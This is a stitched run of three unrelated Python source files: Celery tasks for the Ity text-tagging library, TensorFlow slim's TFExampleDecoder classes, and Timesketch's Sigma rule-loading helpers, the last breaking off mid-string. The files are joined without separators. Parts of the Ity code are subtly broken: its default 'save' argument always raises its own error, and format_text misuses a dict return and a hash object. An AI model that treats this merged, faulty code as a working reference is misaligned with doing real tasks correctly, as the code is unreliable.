# coding=utf-8 from __future__ import absolute_import import os import sys sys.path.append(os.path.join( os.path.dirname(os.path.basename(__file__)), ".." )) sys.path.append(os.path.dirname(__file__)) from collections import OrderedDict import codecs import json import hashlib # Ity Imports import Ity from Ity.Utilities import Corpus, CorpusText from Ity.TaskSupport import * # Celery from celery import Celery from celery.utils.log import get_task_logger celery_app = Celery(__name__) celery_app.config_from_object("celery_config") logger = get_task_logger(__name__) # Sentry / Raven if "SENTRY_DSN" in celery_app.conf: from raven import Client from raven.contrib.celery import register_signal client = Client( dsn=celery_app.conf["SENTRY_DSN"] ) register_signal(client) @celery_app.task def upload_corpus(data): pass @celery_app.task def process_corpus( tokenizer="RegexTokenizer", taggers=("DocuscopeTagger",), formatters=("HTMLFormatter",), corpus_formatters=("CSVFormatter",), **corpus_kwargs ): """ Processes an entire corpus of texts, given a path to them, using a certain tokenizer, taggers, formatters, and corpus formatters. Additional arguments include "path", "output_path" and more--- please refer to init method of the Ity.Utilities.Corpus class. By the way, while the `formatters` operate on single texts with their format() method, `corpus_formatters` operate on the entire corpus with their batch_format() method. That's the distinction. The `tokenizer` argument, as well as **any tuple item** in the `taggers`, `formatters`, or `corpus_formatters` arguments may be one of the following: * A **str** equal to the name of an appropriate Ity class, i.e. `tokenizer="RegexTokenizer"`, `taggers=("DocuscopeTagger", "CSVTagger")` * An appropriate **class** that has been imported, i.e. `tokenizer=RegexTokenizer`, `taggers=(DocuscopeTagger, CSVTagger)` * An **instance** of an appropriate Ity class, i.e. `tokenizer=my_tokenizer`, `taggers=(first_tagger, second_tagger)` You may process texts in a corpus with multiple taggers and formatters, but may only use one tokenizer; the rest of the modules up the chain have to agree on *something*, right? :param tokenizer: A str, an Ity Tokenizer class, or an Ity Tokenizer instance. :param taggers: A tuple of strs, Ity Tagger classes, or Ity Taggers instances. :param formatters: A tuple of strs, Ity Formatter classes, or Ity Formatter instances. :param corpus_formatters: A tuple of strs, Ity Formatter classes, or Ity Formatter instances. :param corpus_kwargs: Keyword arguments to be passed to the Ity.Utilities.Corpus init() method: `path`, `output_path`, etc. :return: """ corpus = Corpus(**corpus_kwargs) # Take the tokenizer, taggers, formatters, and batch_formatters arguments # and initialize whatever modules we need. tokenizer = init_tokenizer(tokenizer) taggers = [ init_tagger(tagger) for tagger in taggers ] formatters = [ init_formatter(formatter) for formatter in formatters ] corpus_formatters = [ init_formatter(corpus_formatter) for corpus_formatter in corpus_formatters ] # Process each text in the corpus. results = OrderedDict() for name, path in corpus.texts.items(): results[name] = process_text( path=path, tokenizer=tokenizer, taggers=taggers, formatters=formatters, corpus_instance=corpus ) # Use some of the results to generate output with the corpus_formatters. 
# for corpus_formatter in corpus_formatters: corpus_results = None return corpus, results, corpus_results @celery_app.task def process_text( path, name=None, tokenizer="RegexTokenizer", taggers=("DocuscopeTagger",), formatters=("StaticHTMLFormatter",), corpus_instance=None, save=("format_data",), save_to_disk=True ): """ Given a path to a text file, process a text using Ity. """ if save is None or ( "text_str" not in save and "tokens" not in save and "rules" not in save and "tags" not in save and "formats" not in save ): raise ValueError("We're not supposed to save any data? Why are we even generating it, then?") # Create a CorpusText instance for this text file. text_instance = CorpusText(path, name=name, corpus=corpus_instance) # Prep the Ity modules for processing. # This is going to look a little weird: "didn't you initialize the modules # in process_corpus()?" # Yes, we did. the init_tokenizer(), init_tagger(), and init_formatter() # functions all check to see if the input is already an instance. If they # get a str or a class instead, they'll do the right thing! tokenizer = init_tokenizer(tokenizer) taggers = [ init_tagger(tagger) for tagger in taggers ] formatters = [ init_formatter(formatter) for formatter in formatters ] # Tokenize the text content. text_instance.tokens = tokenize_text(text_instance.text_str, tokenizer) # Tag this text with the specified Tagger classes. for tagger_index, tagger in enumerate(taggers): # Raise an exception if we're tagging a second time with [effectively] # the exact same tagger---all the same settings that matter and such. # (This is why it's important to make sure that Ity modules provide # a precise full_label properties.) if tagger.full_label in text_instance.tag_data: raise ValueError("Needlessly tagging a text with an identically configured tagger for a second time: %s" % tagger.full_label) rules, tags = tag_tokens(text_instance.tokens, tagger) # Append a dict of information from this tagger. text_instance.tag_data[tagger.full_label] = { "tags": tags, "rules": rules, "label": tagger.label, "full_label": tagger.full_label } # Format each tagged output for this text with the specified Formatter classes. for formatter_index, formatter in enumerate(formatters): # Raise an exception if we're formatting a second time with # [effectively] the exact same formatter---all the same settings # that matter and such. if formatter.full_label in text_instance.format_data: raise ValueError("Needlessly formatting a text with an identically configured formatter for a second time: %s" % tagger.full_label) # tagger_instance.tag_data may contain the output of multiple taggers. # The format_text() function will generate a separate output for each tagger. # Also, note that we're not passing the format_text() function the # text_str or tokens arguments because we're passing it a CorpusText # instance, which has been previously updated above to contain the # text's tokens and tag_data. Additionally, the text_str property # provides the text file's contents. text_instance.format_data = format_text( text_instance=text_instance, # Contains tokens, text_str, and tag_data for one or more taggers formatter=formatter, save_to_disk=save_to_disk and "formats" in save ) # Return ONLY the processed text results we want by way of the CorpusText instance. # This means we're going to clear out the stuff we weren't asked to save. # Conditionally add data to the return value. 
# TODO: Add support for writing certain Python data structures to disk (other than Formatters, which will be able to write to disk on their own.) if "metadata" not in save: text_instance.metadata = None if "text_str" not in save: text_instance._text_str = None if "tokens" not in save: text_instance.tokens = [] if "tag_data" not in save: text_instance.tag_data = {} if "format_data" not in save: text_instance.format_data = {} return text_instance @celery_app.task def get_text_str(text_path): with codecs.open(text_path, "r", encoding="utf-8") as text_file: text = text_file.read() return text @celery_app.task def tokenize_text(text, tokenizer="RegexTokenizer"): """ Tokenizes a text string. """ try: tokenizer_instance = init_tokenizer(tokenizer) except (ValueError, ImportError): raise ValueError("Invalid tokenizer module specified.") tokens = tokenizer_instance.tokenize(text) return tokens @celery_app.task def tag_tokens(tokens, tagger="DocuscopeTagger"): """ Tags a tuple of tokens. """ try: tagger_instance = init_tagger(tagger) except (ValueError, ImportError): raise ValueError("Invalid tagger module specified.") tags, tag_maps = tagger_instance.tag(tokens) return tags, tag_maps @celery_app.task def format_text( tags=None, rules=None, tokens=None, text_str=None, text_instance=None, formatter="StaticHTMLFormatter", save_to_disk=True ): # Try to get or otherwise instantiate the formatter module. try: formatter_instance = initialize_modules([formatter])[0] except (ValueError, ImportError): raise ValueError("Invalid tagger module specified.") # If we're saving the formatted output to disk, figure out where it's going. if not save_to_disk: output_path = None output_name = None else: if text_instance is not None and hasattr(text_instance, "output_path"): # This output path includes the text_instance name in it already. output_path = text_instance.output_path elif hasattr(text_instance, "corpus") and text_instance.corpus is not None and hasattr(text_instance.corpus, "output_path"): output_path = text_instance.corpus.output_path else: output_path = Ity.corpus_root # Okay, we have the output path, but how about the output filename? if text_instance is None or not hasattr(text_instance, "name"): # Generate a name, I guess. output_name = hashlib.sha1() output_path = os.path.join(output_path, output_name) # Actually call format()! format_output = formatter_instance.format( output_path=output_path, tags=tags, rules=rules, tokens=tokens, text_str=text_str ) return format_output @celery_app.task def get_output_dir(text=None, corpus=None): #TODO: Remove this. Blargh. output_dir = Ity.output_root if corpus is not None and hasattr(corpus, "name"): output_dir = os.path.join(output_dir, corpus.name) return output_dir @celery_app.task def initialize_modules(modules): initialized_modules = {} for module_index, module_kwargs in enumerate(modules): # Will this module instance be passed a `label` argument? if "label" not in module_kwargs: module_kwargs["label"] = module_index # Anyway, what kind of module is this supposed to be? module_instance = None if "tokenizer" in module_kwargs: module_instance = init_tokenizer(**module_kwargs) elif "tagger" in module_kwargs: module_instance = init_tagger(**module_kwargs) elif "formatter" in module_kwargs: module_instance = init_formatter(**module_kwargs) # We should definitely have an instantiated module by now. 
if module_instance is None: raise ValueError("Invalid Ity module specified: %s" % str(module_kwargs)) initialized_modules[module_instance.full_label] = module_instance return initialized_modules
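# Hedged usage sketch: the paths below are hypothetical and a running Celery broker is
# assumed. process_corpus() accepts strings, classes, or instances for the tokenizer,
# taggers, and formatters, plus Corpus keyword arguments such as `path` and `output_path`.
def _example_process_corpus_call():
    """Illustrative only; never invoked by the tasks above."""
    return process_corpus.delay(
        tokenizer="RegexTokenizer",
        taggers=("DocuscopeTagger",),
        formatters=("HTMLFormatter",),
        corpus_formatters=("CSVFormatter",),
        path="/tmp/my_corpus",            # hypothetical corpus location
        output_path="/tmp/my_corpus_out"  # hypothetical output location
    )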
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Contains the TFExampleDecoder its associated helper classes. The TFExampleDecode is a DataDecoder used to decode TensorFlow Example protos. In order to do so each requested item must be paired with one or more Example features that are parsed to produce the Tensor-based manifestation of the item. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc from tensorflow.contrib.slim.python.slim.data import data_decoder from tensorflow.python.framework import dtypes from tensorflow.python.framework import sparse_tensor from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import functional_ops from tensorflow.python.ops import image_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import parsing_ops from tensorflow.python.ops import sparse_ops class ItemHandler(object): """Specifies the item-to-Features mapping for tf.parse_example. An ItemHandler both specifies a list of Features used for parsing an Example proto as well as a function that post-processes the results of Example parsing. """ __metaclass__ = abc.ABCMeta def __init__(self, keys): """Constructs the handler with the name of the tf.Feature keys to use. See third_party/tensorflow/core/example/feature.proto Args: keys: the name of the TensorFlow Example Feature. """ if not isinstance(keys, (tuple, list)): keys = [keys] self._keys = keys @property def keys(self): return self._keys @abc.abstractmethod def tensors_to_item(self, keys_to_tensors): """Maps the given dictionary of tensors to the requested item. Args: keys_to_tensors: a mapping of TF-Example keys to parsed tensors. Returns: the final tensor representing the item being handled. """ pass class ItemHandlerCallback(ItemHandler): """An ItemHandler that converts the parsed tensors via a given function. Unlike other ItemHandlers, the ItemHandlerCallback resolves its item via a callback function rather than using prespecified behavior. """ def __init__(self, keys, func): """Initializes the ItemHandler. Args: keys: a list of TF-Example keys. func: a function that takes as an argument a dictionary from `keys` to parsed Tensors. """ super(ItemHandlerCallback, self).__init__(keys) self._func = func def tensors_to_item(self, keys_to_tensors): return self._func(keys_to_tensors) class BoundingBox(ItemHandler): """An ItemHandler that concatenates a set of parsed Tensors to Bounding Boxes. """ def __init__(self, keys=None, prefix=None): """Initialize the bounding box handler. Args: keys: A list of four key names representing the ymin, xmin, ymax, mmax prefix: An optional prefix for each of the bounding box keys. If provided, `prefix` is appended to each key in `keys`. 
Raises: ValueError: if keys is not `None` and also not a list of exactly 4 keys """ if keys is None: keys = ['ymin', 'xmin', 'ymax', 'xmax'] elif len(keys) != 4: raise ValueError('BoundingBox expects 4 keys but got {}'.format( len(keys))) self._prefix = prefix self._keys = keys self._full_keys = [prefix + k for k in keys] super(BoundingBox, self).__init__(self._full_keys) def tensors_to_item(self, keys_to_tensors): """Maps the given dictionary of tensors to a contatenated list of bboxes. Args: keys_to_tensors: a mapping of TF-Example keys to parsed tensors. Returns: [num_boxes, 4] tensor of bounding box coordinates, i.e. 1 bounding box per row, in order [y_min, x_min, y_max, x_max]. """ sides = [] for key in self._full_keys: side = array_ops.expand_dims(keys_to_tensors[key].values, 0) sides.append(side) bounding_box = array_ops.concat(sides, 0) return array_ops.transpose(bounding_box) class Tensor(ItemHandler): """An ItemHandler that returns a parsed Tensor.""" def __init__(self, tensor_key, shape_keys=None, shape=None, default_value=0): """Initializes the Tensor handler. Tensors are, by default, returned without any reshaping. However, there are two mechanisms which allow reshaping to occur at load time. If `shape_keys` is provided, both the `Tensor` corresponding to `tensor_key` and `shape_keys` is loaded and the former `Tensor` is reshaped with the values of the latter. Alternatively, if a fixed `shape` is provided, the `Tensor` corresponding to `tensor_key` is loaded and reshape appropriately. If neither `shape_keys` nor `shape` are provided, the `Tensor` will be returned without any reshaping. Args: tensor_key: the name of the `TFExample` feature to read the tensor from. shape_keys: Optional name or list of names of the TF-Example feature in which the tensor shape is stored. If a list, then each corresponds to one dimension of the shape. shape: Optional output shape of the `Tensor`. If provided, the `Tensor` is reshaped accordingly. default_value: The value used when the `tensor_key` is not found in a particular `TFExample`. Raises: ValueError: if both `shape_keys` and `shape` are specified. """ if shape_keys and shape is not None: raise ValueError('Cannot specify both shape_keys and shape parameters.') if shape_keys and not isinstance(shape_keys, list): shape_keys = [shape_keys] self._tensor_key = tensor_key self._shape_keys = shape_keys self._shape = shape self._default_value = default_value keys = [tensor_key] if shape_keys: keys.extend(shape_keys) super(Tensor, self).__init__(keys) def tensors_to_item(self, keys_to_tensors): tensor = keys_to_tensors[self._tensor_key] shape = self._shape if self._shape_keys: shape_dims = [] for k in self._shape_keys: shape_dim = keys_to_tensors[k] if isinstance(shape_dim, sparse_tensor.SparseTensor): shape_dim = sparse_ops.sparse_tensor_to_dense(shape_dim) shape_dims.append(shape_dim) shape = array_ops.reshape(array_ops.stack(shape_dims), [-1]) if isinstance(tensor, sparse_tensor.SparseTensor): if shape is not None: tensor = sparse_ops.sparse_reshape(tensor, shape) tensor = sparse_ops.sparse_tensor_to_dense(tensor, self._default_value) else: if shape is not None: tensor = array_ops.reshape(tensor, shape) return tensor class SparseTensor(ItemHandler): """An ItemHandler for SparseTensors.""" def __init__(self, indices_key=None, values_key=None, shape_key=None, shape=None, densify=False, default_value=0): """Initializes the Tensor handler. Args: indices_key: the name of the TF-Example feature that contains the ids. Defaults to 'indices'. 
values_key: the name of the TF-Example feature that contains the values. Defaults to 'values'. shape_key: the name of the TF-Example feature that contains the shape. If provided it would be used. shape: the output shape of the SparseTensor. If `shape_key` is not provided this `shape` would be used. densify: whether to convert the SparseTensor into a dense Tensor. default_value: Scalar value to set when making dense for indices not specified in the `SparseTensor`. """ indices_key = indices_key or 'indices' values_key = values_key or 'values' self._indices_key = indices_key self._values_key = values_key self._shape_key = shape_key self._shape = shape self._densify = densify self._default_value = default_value keys = [indices_key, values_key] if shape_key: keys.append(shape_key) super(SparseTensor, self).__init__(keys) def tensors_to_item(self, keys_to_tensors): indices = keys_to_tensors[self._indices_key] values = keys_to_tensors[self._values_key] if self._shape_key: shape = keys_to_tensors[self._shape_key] if isinstance(shape, sparse_tensor.SparseTensor): shape = sparse_ops.sparse_tensor_to_dense(shape) elif self._shape: shape = self._shape else: shape = indices.dense_shape indices_shape = array_ops.shape(indices.indices) rank = indices_shape[1] ids = math_ops.to_int64(indices.values) indices_columns_to_preserve = array_ops.slice( indices.indices, [0, 0], array_ops.stack([-1, rank - 1])) new_indices = array_ops.concat( [indices_columns_to_preserve, array_ops.reshape(ids, [-1, 1])], 1) tensor = sparse_tensor.SparseTensor(new_indices, values.values, shape) if self._densify: tensor = sparse_ops.sparse_tensor_to_dense(tensor, self._default_value) return tensor class Image(ItemHandler): """An ItemHandler that decodes a parsed Tensor as an image.""" def __init__(self, image_key=None, format_key=None, shape=None, channels=3, dtype=dtypes.uint8, repeated=False): """Initializes the image. Args: image_key: the name of the TF-Example feature in which the encoded image is stored. format_key: the name of the TF-Example feature in which the image format is stored. shape: the output shape of the image as 1-D `Tensor` [height, width, channels]. If provided, the image is reshaped accordingly. If left as None, no reshaping is done. A shape should be supplied only if all the stored images have the same shape. channels: the number of channels in the image. dtype: images will be decoded at this bit depth. Different formats support different bit depths. See tf.image.decode_image, tf.decode_raw, repeated: if False, decodes a single image. If True, decodes a variable number of image strings from a 1D tensor of strings. """ if not image_key: image_key = 'image/encoded' if not format_key: format_key = 'image/format' super(Image, self).__init__([image_key, format_key]) self._image_key = image_key self._format_key = format_key self._shape = shape self._channels = channels self._dtype = dtype self._repeated = repeated def tensors_to_item(self, keys_to_tensors): """See base class.""" image_buffer = keys_to_tensors[self._image_key] image_format = keys_to_tensors[self._format_key] if self._repeated: return functional_ops.map_fn(lambda x: self._decode(x, image_format), image_buffer, dtype=self._dtype) else: return self._decode(image_buffer, image_format) def _decode(self, image_buffer, image_format): """Decodes the image buffer. Args: image_buffer: The tensor representing the encoded image tensor. image_format: The image format for the image in `image_buffer`. 
If image format is `raw`, all images are expected to be in this format, otherwise this op can decode a mix of `jpg` and `png` formats. Returns: A tensor that represents decoded image of self._shape, or (?, ?, self._channels) if self._shape is not specified. """ def decode_image(): """Decodes a png or jpg based on the headers.""" return image_ops.decode_image(image_buffer, self._channels) def decode_raw(): """Decodes a raw image.""" return parsing_ops.decode_raw(image_buffer, out_type=self._dtype) pred_fn_pairs = { math_ops.logical_or( math_ops.equal(image_format, 'raw'), math_ops.equal(image_format, 'RAW')): decode_raw, } image = control_flow_ops.case( pred_fn_pairs, default=decode_image, exclusive=True) image.set_shape([None, None, self._channels]) if self._shape is not None: image = array_ops.reshape(image, self._shape) return image class TFExampleDecoder(data_decoder.DataDecoder): """A decoder for TensorFlow Examples. Decoding Example proto buffers is comprised of two stages: (1) Example parsing and (2) tensor manipulation. In the first stage, the tf.parse_example function is called with a list of FixedLenFeatures and SparseLenFeatures. These instances tell TF how to parse the example. The output of this stage is a set of tensors. In the second stage, the resulting tensors are manipulated to provide the requested 'item' tensors. To perform this decoding operation, an ExampleDecoder is given a list of ItemHandlers. Each ItemHandler indicates the set of features for stage 1 and contains the instructions for post_processing its tensors for stage 2. """ def __init__(self, keys_to_features, items_to_handlers): """Constructs the decoder. Args: keys_to_features: a dictionary from TF-Example keys to either tf.VarLenFeature or tf.FixedLenFeature instances. See tensorflow's parsing_ops.py. items_to_handlers: a dictionary from items (strings) to ItemHandler instances. Note that the ItemHandler's are provided the keys that they use to return the final item Tensors. """ self._keys_to_features = keys_to_features self._items_to_handlers = items_to_handlers def list_items(self): """See base class.""" return list(self._items_to_handlers.keys()) def decode(self, serialized_example, items=None): """Decodes the given serialized TF-example. Args: serialized_example: a serialized TF-example tensor. items: the list of items to decode. These must be a subset of the item keys in self._items_to_handlers. If `items` is left as None, then all of the items in self._items_to_handlers are decoded. Returns: the decoded items, a list of tensor. """ example = parsing_ops.parse_single_example(serialized_example, self._keys_to_features) # Reshape non-sparse elements just once, adding the reshape ops in # deterministic order. for k in sorted(self._keys_to_features): v = self._keys_to_features[k] if isinstance(v, parsing_ops.FixedLenFeature): example[k] = array_ops.reshape(example[k], v.shape) if not items: items = self._items_to_handlers.keys() outputs = [] for item in items: handler = self._items_to_handlers[item] keys_to_tensors = {key: example[key] for key in handler.keys} outputs.append(handler.tensors_to_item(keys_to_tensors)) return outputs
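# Hedged usage sketch; the feature keys below are illustrative, not mandated by this module.
# A typical decoder pairs parse_example features with the ItemHandlers defined above, e.g.
# an encoded image plus an integer class label.
def _example_decoder():
  """Builds a TFExampleDecoder for an image/label TF-Example layout (sketch only)."""
  keys_to_features = {
      'image/encoded': parsing_ops.FixedLenFeature((), dtypes.string, default_value=''),
      'image/format': parsing_ops.FixedLenFeature((), dtypes.string, default_value='jpeg'),
      'image/class/label': parsing_ops.FixedLenFeature([], dtypes.int64, default_value=0),
  }
  items_to_handlers = {
      'image': Image(),
      'label': Tensor('image/class/label'),
  }
  return TFExampleDecoder(keys_to_features, items_to_handlers)

# Typical use: image, label = _example_decoder().decode(serialized_example, ['image', 'label'])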
# Copyright 2020 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Timesketch Sigma lib functions.""" import re import os import codecs import csv import logging from datetime import datetime import yaml import pandas as pd from flask import current_app import sigma.configuration as sigma_configuration from sigma.backends import elasticsearch as sigma_es from sigma.parser import collection as sigma_collection from sigma.parser import exceptions as sigma_exceptions from sigma.config.exceptions import SigmaConfigParseError logger = logging.getLogger('timesketch.lib.sigma') def get_sigma_config_file(config_file=None): """Get a sigma.configuration.SigmaConfiguration object. Args: config_file: Optional path to a config file Returns: A sigma.configuration.SigmaConfiguration object Raises: ValueError: If SIGMA_CONFIG is not found in the config file. or the Sigma config file is not readabale. SigmaConfigParseError: If config file could not be parsed. """ if config_file: config_file_path = config_file else: config_file_path = current_app.config.get( 'SIGMA_CONFIG', './data/sigma_config.yaml' ) if not config_file_path: raise ValueError('No config_file_path set via param or config file') if not os.path.isfile(config_file_path): raise ValueError( 'Unable to open: [{0:s}], does not exist.'.format(config_file_path) ) if not os.access(config_file_path, os.R_OK): raise ValueError( 'Unable to open file: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(config_file_path) ) with open(config_file_path, 'r', encoding='utf-8') as config_file_read: sigma_config_file = config_file_read.read() try: sigma_config = sigma_configuration.SigmaConfiguration( sigma_config_file ) except SigmaConfigParseError: logger.error('Parsing error with {0:s}'.format(sigma_config_file)) raise return sigma_config def get_sigma_rules_path(): """Get Sigma rules paths. Returns: A list of strings to the Sigma rules Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. """ try: rules_path = current_app.config.get('SIGMA_RULES_FOLDERS', []) except RuntimeError as e: raise ValueError('SIGMA_RULES_FOLDERS not found in config file') from e if not rules_path: raise ValueError('SIGMA_RULES_FOLDERS not found in config file') for folder in rules_path: if not os.path.isdir(folder): raise ValueError( 'Unable to open dir: [{0:s}], it does not exist.'.format( folder ) ) if not os.access(folder, os.R_OK): raise ValueError( 'Unable to open dir: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(folder) ) return rules_path def get_sigma_rules(rule_folder, sigma_config=None): """Returns the Sigma rules for a folder including subfolders. Args: rule_folder: folder to be checked for rules sigma_config: optional argument to pass a sigma.configuration.SigmaConfiguration object Returns: A array of Sigma rules as JSON Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. 
""" return_array = [] blocklist_path = None ignore = get_sigma_blocklist(blocklist_path) ignore_list = list(ignore['path'].unique()) for dirpath, dirnames, files in os.walk(rule_folder): if 'deprecated' in [x.lower() for x in dirnames]: dirnames.remove('deprecated') for rule_filename in files: if rule_filename.lower().endswith('.yml'): # if a sub dir is found, do not try to parse it. if os.path.isdir(os.path.join(dirpath, rule_filename)): continue rule_file_path = os.path.join(dirpath, rule_filename) if any(x in rule_file_path for x in ignore_list): continue parsed_rule = get_sigma_rule(rule_file_path, sigma_config) if parsed_rule: return_array.append(parsed_rule) return return_array def get_all_sigma_rules(): """Returns all Sigma rules Returns: A array of Sigma rules Raises: ValueError: If SIGMA_RULES_FOLDERS is not found in the config file. or the folders are not readabale. """ sigma_rules = [] rules_paths = get_sigma_rules_path() for folder in rules_paths: sigma_rules.extend(get_sigma_rules(folder)) return sigma_rules def get_sigma_rule(filepath, sigma_config=None): """Returns a JSON represenation for a rule Args: filepath: path to the sigma rule to be parsed sigma_config: optional argument to pass a sigma.configuration.SigmaConfiguration object Returns: Json representation of the parsed rule Raises: ValueError: Parsing error IsADirectoryError: If a directory is passed as filepath """ try: if isinstance(sigma_config, sigma_configuration.SigmaConfiguration): sigma_conf_obj = sigma_config elif isinstance(sigma_config, str): sigma_conf_obj = get_sigma_config_file(sigma_config) else: sigma_conf_obj = get_sigma_config_file() except ValueError as e: logger.error('Problem reading the Sigma config', exc_info=True) raise ValueError('Problem reading the Sigma config') from e sigma_backend = sigma_es.ElasticsearchQuerystringBackend( sigma_conf_obj, {} ) try: sigma_rules_paths = get_sigma_rules_path() except ValueError: sigma_rules_paths = None if not filepath.lower().endswith('.yml'): raise ValueError(f'{filepath} does not end with .yml') # if a sub dir is found, nothing can be parsed if os.path.isdir(filepath): raise IsADirectoryError(f'{filepath} is a directory - must be a file') abs_path = os.path.abspath(filepath) with codecs.open( abs_path, 'r', encoding='utf-8', errors='replace' ) as file: try: rule_return = {} rule_yaml_data = yaml.safe_load_all(file.read()) for doc in rule_yaml_data: rule_return.update(doc) parser = sigma_collection.SigmaCollectionParser( yaml.safe_dump(doc), sigma_conf_obj, None ) parsed_sigma_rules = parser.generate(sigma_backend) except NotImplementedError as exception: logger.error('Error rule {0:s}: {1!s}'.format(abs_path, exception)) add_problematic_rule( filepath, doc.get('id'), 'Part of the rule not supported in TS' ) return None except sigma_exceptions.SigmaParseError as exception: logger.error( 'Sigma parsing error rule in file {0:s}: {1!s}'.format( abs_path, exception ) ) add_problematic_rule( filepath, doc.get('id'), 'sigma_exceptions.SigmaParseError' ) return None except yaml.parser.ParserError as exception: logger.error( 'Yaml parsing error rule in file {0:s}: {1!s}'.format( abs_path, exception ) ) add_problematic_rule(filepath, None, 'yaml.parser.ParserError') return None sigma_es_query = '' for sigma_rule in parsed_sigma_rules: sigma_es_query = _sanitize_query(sigma_rule) rule_return.update({'es_query': sigma_es_query}) rule_return.update({'file_name': os.path.basename(filepath)}) # in case multiple folders are in the config, need to remove them if 
sigma_rules_paths: for rule_path in sigma_rules_paths: file_relpath = os.path.relpath(filepath, rule_path) else: file_relpath = 'N/A' rule_return.update({'file_relpath': file_relpath}) return rule_return def _sanitize_query(sigma_rule_query: str) -> str: """Returns a sanitized query Args: sigma_rule_query: path to the sigma rule to be parsed Returns: String of a cleaned string """ # TODO: Investigate how to handle .keyword # fields in Sigma. # https://github.com/google/timesketch/issues/1199#issuecomment-639475885 sigma_rule_query = sigma_rule_query.replace('.keyword:', ':') sigma_rule_query = sigma_rule_query.replace('\\ ', ' ') sigma_rule_query = sigma_rule_query.replace('\\:', ':') sigma_rule_query = sigma_rule_query.replace('\\-', '-') sigma_rule_query = sigma_rule_query.replace('*\\\\', ' *') sigma_rule_query = sigma_rule_query.replace('::', r'\:\:') # TODO: Improve the whitespace handling # https://github.com/google/timesketch/issues/2007 # check if there is a ' * ' # if one is found split it up into elements seperated by space # and go backwards to the next star sigma_rule_query = sigma_rule_query.replace(' * OR', ' " OR') sigma_rule_query = sigma_rule_query.replace(' * AND', ' " AND') sigma_rule_query = sigma_rule_query.replace('OR * ', 'OR " ') sigma_rule_query = sigma_rule_query.replace('AND * ', 'AND " ') sigma_rule_query = sigma_rule_query.replace('(* ', '(" ') sigma_rule_query = sigma_rule_query.replace(' *)', ' ")') sigma_rule_query = sigma_rule_query.replace('*)', '")') sigma_rule_query = sigma_rule_query.replace('(*', '("') sigma_rule_query = sigma_rule_query.replace( r'\*:', '' ) # removes wildcard at the beginning of a rule es_query elements = re.split(r'\s+', sigma_rule_query) san = [] for el in elements: if el.count('*') == 1: # indicates a string that had a space before with only one star san.append(el.replace('*', '"')) else: san.append(el) sigma_rule_query = ' '.join(san) # above method might create strings that have '' in them, workaround: sigma_rule_query = sigma_rule_query.replace('""', '"') return sigma_rule_query def get_sigma_blocklist(blocklist_path=None): """Get a dataframe of sigma rules to ignore. This includes filenames, paths, ids. Args: blocklist_path(str): Path to a blocklist file. The default value is None Returns: Pandas dataframe with blocklist Raises: ValueError: Sigma blocklist file is not readabale. """ return pd.read_csv(get_sigma_blocklist_path(blocklist_path)) def get_sigma_blocklist_path(blocklist_path=None): """Checks and returns the Sigma blocklist path. This includes filenames, paths, ids. Args: blocklist_path(str): Path to a blocklist file. The default value is './data/sigma_blocklist.csv' Returns: Sigma Blocklist path Raises: ValueError: Sigma blocklist file is not readabale. """ logger.error(blocklist_path) if not blocklist_path or blocklist_path == '': blocklist_path = current_app.config.get( 'SIGMA_BLOCKLIST_CSV', './data/sigma_blocklist.csv' ) if not blocklist_path: raise ValueError('No blocklist_file_path set via param or config file') if not os.path.isfile(blocklist_path): raise ValueError( 'Unable to open file: [{0:s}] does not exist'.format( blocklist_path ) ) if not os.access(blocklist_path, os.R_OK): raise ValueError( 'Unable to open file: [{0:s}], cannot open it for ' 'read, please check permissions.'.format(blocklist_path) ) return blocklist_path def add_problematic_rule(filepath, rule_uuid=None, reason=None): """Adds a problematic rule to the blocklist.csv. 
Args: filepath: path to the sigma rule that caused problems rule_uuid: rule uuid reason: optional reason why file is moved """ blocklist_file_path = get_sigma_blocklist_path() # we only want to store the relative paths in the blocklist file try: sigma_rules_paths = get_sigma_rules_path() except ValueError: sigma_rules_paths = None if sigma_rules_paths: for rule_path in sigma_rules_paths: file_relpath = os.path.relpath(filepath, rule_path) # path,bad,reason,last_ckecked,rule_id fields = [ file_relpath, 'bad', reason, datetime.now().strftime('%Y-%m-%d'), rule_uuid, ] with open(blocklist_file_path, 'a', encoding='utf-8') as f: writer = csv.writer(f) writer.writerow(fields) def get_sigma_rule_by_text(rule_text, sigma_config=None): """Returns a JSON represenation for a rule Args: rule_text: Text of the sigma rule to be parsed sigma_config: config file object Returns: Json representation of the parsed rule Raises: sigma_exceptions.SigmaParseError: Issue with parsing the given rule yaml.parser.ParserError: Not a correct YAML text provided NotImplementedError: A feature in the provided Sigma rule is not implemented in Sigma for Timesketch """ try: if isinstance(sigma_config, sigma_configuration.SigmaConfiguration): sigma_conf_obj = sigma_config elif isinstance(sigma_config, str): sigma_conf_obj = get_sigma_config_file(sigma_config) else: sigma_conf_obj = get_sigma_config_file() except ValueError as e: logger.error('Problem reading the Sigma config', exc_info=True) raise ValueError('Problem reading the Sigma config') from e sigma_backend = sigma_es.ElasticsearchQuerystringBackend( sigma_conf_obj, {} ) rule_return = {} # TODO check if input validation is needed / useful. try: rule_yaml_data = yaml.safe_load_all(rule_text) for doc in rule_yaml_data: parser = sigma_collection.SigmaCollectionParser( str(doc), sigma_conf_obj, None ) parsed_sigma_rules = parser.generate(sigma_backend) rule_return.update(doc) except NotImplementedError as exception: logger.error('Error generating rule {0!s}'.format(exception)) raise except sigma_exceptions.SigmaParseError as exception: logger.error('Sigma parsing error rule 